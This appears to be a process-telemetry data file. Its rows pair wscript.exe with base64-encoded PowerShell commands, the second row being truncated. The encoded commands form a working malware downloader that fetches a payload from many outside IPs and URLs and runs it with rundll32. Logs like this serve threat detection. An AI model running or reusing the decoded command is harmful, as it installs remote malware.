parent_process	wscript.exe	martian_process	powershell -encodedcommand "JABsAGEAbgBvAGwAaQBuAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAOABBAGQAZwBCAGwAQQBIAEkAQQBkAEEAQgBvAEEASABJAEEAWgBRAEIAMwBBAEUAdwBBAFkAUQBCAGsAQQBHAGsAQQBaAGcAQgA1AEEAQwA0AEEAWgBRAEIAaABBAEgASQBBAGQAQQBCAG8AQQBBAD0APQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBZAFEAQgA1AEEASABVAEEAYwB3AEIAbABBAEgATQBBAFQAQQBCAGgAQQBHAEkAQQBiAHcAQgB5AEEARwBFAEEAYgBnAEIAMABBAEMANABBAGQAQQBCAHAAQQBIAEkAQQBiAHcAQgBzAEEAQQA9AD0ARABUAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBnAEEAdQBBAEQAWQBBAE8AUQBBAHUAQQBEAFEAQQBOAHcAQQB1AEEARABjAEEATwBBAEEAPQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABjAHIAdQBzAHQAYQBjAGUAbwBsAG8AZwBpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE4AZwBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAFkAQQBOAFEAQQA9AE4AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQBOAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEcAVQBBAGMAdwBCAGoAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEAVQBBAEIAeQBBAEcAVQBBAGMAdwBCADAAQQBHAGsAQQBaAHcAQgBwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAHcAQQBiAHcAQgBoAEEARwA0AEEATgBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAUQBBAEwAZwBBAHgAQQBEAEEAQQBNAHcAQQA9ACIAOwAkAHMAdABvAHIAYQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABZAEEATABnAEEAMQBBAEQAVQBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEAegBVAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBRAEEAdQBBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBnAEEAdwBBAEQAWQBBAHoAVQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAUQBCADIAQQBHAFUAQQBkAEEAQgB2AEEARwA0AEEAWgBRAEIAUwBBAEcARQBBAGIAUQBCAHoAQQBIAFEAQQBaAFEAQgBoAEEARwBRAEEATABnAEIAcwBBAEgAUQBBAFoAQQBCAGgAQQBBAD0APQB6AFUAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGwAQQBHADQAQQBkAEEAQgB5AEEARwBFAEEAYQBRAEIAdQBBAEMANABBAGEAUQBCAHoAQQBBAD0APQAiADsAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAEEAQQBMAGcAQQA0AEEARABnAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA4AEEAVwBRAEIAcQBBAEYASQBBAEwAdwBCAEgAQQBFADgAQQBkAGcAQgA0AEEARQBVAEEAcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABFAEEATQB3AEEANABBAEMANABBAE8AQQBBADIAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATAB3AEIAcABBAEcARQBBAEwAdwBCAEsAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE8AQQBBAHUAQQBEAFUAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAHcAQgBNAEEASABBAEEATQBRAEIAcQBBAEgAWQBBAEwAdwBCAFQAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBHADAAQQBNAEEAQgBHAEEARwBjAEEAUgB3AEEAMwBBAEcAcwBBAGIAZwBBAD0AcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQB3AEEAVwBBAEIAdABBAEQASQBBAE4AUQBCAFQAQQBHAEUAQQBTAEEAQgBOAEEARgBvAEEATQB3AEEAPQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHQAQQBIAEEAQQBhAEEAQgBJAEEARQBnAEEAYwBRAEIARwBBAEUAdwBBAFEAdwBCAHIAQQBGAGcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB0AGEAdABhAHUAcABhAEQAaQBnAGkAdABhAGwAaQBuACAAaQBuACAAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAAtAHMAcABsAGkAdAAgACIAcQBzAHQAZgAiACkAIAB7AHQAcgB5ACAAewAkAFMAYQBuAGcAdQBpAHMAdQBnAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAFEAQQAwAEEARABRAEEATABnAEEAMABBAEQAUQBBAE4AcgBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCADMAQQBHADgAQQBjAGcAQgByAEEASABNAEEATABnAEIAbgBBAEcAawBBAFoAZwBCADAAQQBIAE0AQQBOAHIAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGcAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQAyAEEAQQA9AD0ATgByAGQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AUQBBAHcAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEANABBAEQATQBBACIAOwAkAHAAaABvAGwAaQBvAHQAYQBVAG4AYQBnAHIAZQBlAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAYQB0AGEAdQBwAGEARABpAGcAaQB0AGEAbABpAG4AKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABwAGgAbwBsAGkAbwB0AGEAVQBuAGEAZwByAGUAZQBpAG4AZwAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABnAHIAdQBuAHQAbABpAG4AZwBNAGUAdABoAGUAcgAuAGcAZQBvAG0AYQBuAHQAaQBjAFQAaAB5AHIAbwBpAGQAZQBhADsAJAB3AGgAbwBsAGUAcwBhAGwAZQBuAGUAcwBzAEkAbgB0AHUAYgBhAHQAbwByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYwBnAEIAbABBAEgAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgB0AEEARwBrAEEAZABBAEIAMABBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBZAGcAQgBsAEEASABRAEEATQBBAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATwBBAEEAdQBBAEQAWQBBAE8AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABZAEEATwBRAEEAPQBNAEEAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBZAHcAQgBqAEEARwBrAEEAWgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBMAGcAQgAzAEEARwBVAEEAWgBBAEIAawBBAEcAawBBAGIAZwBCAG4AQQBBAD0APQAiADsAJABVAG4AZABlAHIAYwByAHUAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAGcAQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZwByAHUAbgB0AGwAaQBuAGcATQBlAHQAaABlAHIALgBnAGUAbwBtAGEAbgB0AGkAYwBUAGgAeQByAG8AaQBkAGUAYQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAMwA2ADMAMAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwBjAEEAYwBnAEIAMQBBAEcANABBAGQAQQBCAHMAQQBHAGsAQQBiAGcAQgBuAEEARQAwAEEAWgBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBsAEEARwA4AEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHAAQQBHAE0AQQBWAEEAQgBvAEEASABrAEEAYwBnAEIAdgBBAEcAawBBAFoAQQBCAGwAQQBHAEUAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEwAbwB0AG0AZQBuAHQATgBlAHAAaAByAG8AZABpAG4AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBVAEEAWQBnAEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAEUAQQBiAEEAQgBwAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAFkAUQBCAHMAQQBDADQAQQBhAFEAQgB6AEEAQQA9AD0ASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGcAQQBMAGcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQARQBBAE4AZwBBAHgAQQBDADQAQQBNAFEAQQA0AEEARABNAEEASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAE0AQQBPAFEAQQB1AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGsAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQATgBvAG4AcAB1AG4AYwB0AHUAYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEEAeABBAEQAawBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABnAEEATQBBAEEAPQAiADsAJABjAG8AdQBuAHQAZQByAHIAbwB1AG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABjAEEATABnAEEAeABBAEQAZwBBAE4AdwBBAHUAQQBEAFkAQQBNAEEAQQA9AHMAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQATQBBAEwAZwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgBRAEEANQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABsAGEAbgBvAGwAaQBuAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAOABBAGQAZwBCAGwAQQBIAEkAQQBkAEEAQgBvAEEASABJAEEAWgBRAEIAMwBBAEUAdwBBAFkAUQBCAGsAQQBHAGsAQQBaAGcAQgA1AEEAQwA0AEEAWgBRAEIAaABBAEgASQBBAGQAQQBCAG8AQQBBAD0APQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBZAFEAQgA1AEEASABVAEEAYwB3AEIAbABBAEgATQBBAFQAQQBCAGgAQQBHAEkAQQBiAHcAQgB5AEEARwBFAEEAYgBnAEIAMABBAEMANABBAGQAQQBCAHAAQQBIAEkAQQBiAHcAQgBzAEEAQQA9AD0ARABUAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBnAEEAdQBBAEQAWQBBAE8AUQBBAHUAQQBEAFEAQQBOAHcAQQB1AEEARABjAEEATwBBAEEAPQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABjAHIAdQBzAHQAYQBjAGUAbwBsAG8AZwBpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE4AZwBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAFkAQQBOAFEAQQA9AE4AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQBOAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEcAVQBBAGMAdwBCAGoAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEAVQBBAEIAeQBBAEcAVQBBAGMAdwBCADAAQQBHAGsAQQBaAHcAQgBwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAHcAQQBiAHcAQgBoAEEARwA0AEEATgBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAUQBBAEwAZwBBAHgAQQBEAEEAQQBNAHcAQQA9ACIAOwAkAHMAdABvAHIAYQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABZAEEATABnAEEAMQBBAEQAVQBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEAegBVAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBRAEEAdQBBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBnAEEAdwBBAEQAWQBBAHoAVQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAUQBCADIAQQBHAFUAQQBkAEEAQgB2AEEARwA0AEEAWgBRAEIAUwBBAEcARQBBAGIAUQBCAHoAQQBIAFEAQQBaAFEAQgBoAEEARwBRAEEATABnAEIAcwBBAEgAUQBBAFoAQQBCAGgAQQBBAD0APQB6AFUAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGwAQQBHADQAQQBkAEEAQgB5AEEARwBFAEEAYQBRAEIAdQBBAEMANABBAGEAUQBCAHoAQQBBAD0APQAiADsAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAEEAQQBMAGcAQQA0AEEARABnAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA4AEEAVwBRAEIAcQBBAEYASQBBAEwAdwBCAEgAQQBFADgAQQBkAGcAQgA0AEEARQBVAEEAcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABFAEEATQB3AEEANABBAEMANABBAE8AQQBBADIAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATAB3AEIAcABBAEcARQBBAEwAdwBCAEsAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE8AQQBBAHUAQQBEAFUAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAHcAQgBNAEEASABBAEEATQBRAEIAcQBBAEgAWQBBAEwAdwBCAFQAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBHADAAQQBNAEEAQgBHAEEARwBjAEEAUgB3AEEAMwBBAEcAcwBBAGIAZwBBAD0AcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQB3AEEAVwBBAEIAdABBAEQASQBBAE4AUQBCAFQAQQBHAEUAQQBTAEEAQgBOAEEARgBvAEEATQB3AEEAPQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHQAQQBIAEEAQQBhAEEAQgBJAEEARQBnAEEAYwBRAEIARwBBAEUAdwBBAFEAdwBCAHIAQQBGAGcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB0AGEAdABhAHUAcABhAEQAaQBnAGkAdABhAGwAaQBuACAAaQBuACAAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAAtAHMAcABsAGkAdAAgACIAcQBzAHQAZgAiACkAIAB7AHQAcgB5ACAAewAkAFMAYQBuAGcAdQBpAHMAdQBnAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAFEAQQAwAEEARABRAEEATABnAEEAMABBAEQAUQBBAE4AcgBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCADMAQQBHADgAQQBjAGcAQgByAEEASABNAEEATABnAEIAbgBBAEcAawBBAFoAZwBCADAAQQBIAE0AQQBOAHIAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGcAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQAyAEEAQQA9AD0ATgByAGQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AUQBBAHcAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEANABBAEQATQBBACIAOwAkAHAAaABvAGwAaQBvAHQAYQBVAG4AYQBnAHIAZQBlAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAYQB0AGEAdQBwAGEARABpAGcAaQB0AGEAbABpAG4AKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABwAGgAbwBsAGkAbwB0AGEAVQBuAGEAZwByAGUAZQBpAG4AZwAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABnAHIAdQBuAHQAbABpAG4AZwBNAGUAdABoAGUAcgAuAGcAZQBvAG0AYQBuAHQAaQBjAFQAaAB5AHIAbwBpAGQAZQBhADsAJAB3AGgAbwBsAGUAcwBhAGwAZQBuAGUAcwBzAEkAbgB0AHUAYgBhAHQAbwByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYwBnAEIAbABBAEgAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgB0AEEARwBrAEEAZABBAEIAMABBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBZAGcAQgBsAEEASABRAEEATQBBAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATwBBAEEAdQBBAEQAWQBBAE8AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABZAEEATwBRAEEAPQBNAEEAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBZAHcAQgBqAEEARwBrAEEAWgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBMAGcAQgAzAEEARwBVAEEAWgBBAEIAawBBAEcAawBBAGIAZwBCAG4AQQBBAD0APQAiADsAJABVAG4AZABlAHIAYwByAHUAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAGcAQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZwByAHUAbgB0AGwAaQBuAGcATQBlAHQAaABlAHIALgBnAGUAbwBtAGEAbgB0AGkAYwBUAGgAeQByAG8AaQBkAGUAYQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAMwA2ADMAMAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwBjAEEAYwBnAEIAMQBBAEcANABBAGQAQQBCAHMAQQBHAGsAQQBiAGcAQgBuAEEARQAwAEEAWgBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBsAEEARwA4AEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHAAQQBHAE0AQQBWAEEAQgBvAEEASABrAEEAYwBnAEIAdgBBAEcAawBBAFoAQQBCAGwAQQBHAEUAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEwAbwB0AG0AZQBuAHQATgBlAHAAaAByAG8AZABpAG4AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBVAEEAWQBnAEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAEUAQQBiAEEAQgBwAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAFkAUQBCAHMAQQBDADQAQQBhAFEAQgB6AEEAQQA9AD0ASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGcAQQBMAGcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQARQBBAE4AZwBBAHgAQQBDADQAQQBNAFEAQQA0AEEARABNAEEASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAE0AQQBPAFEAQQB1AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGsAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQATgBvAG4AcAB1AG4AYwB0AHUAYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEE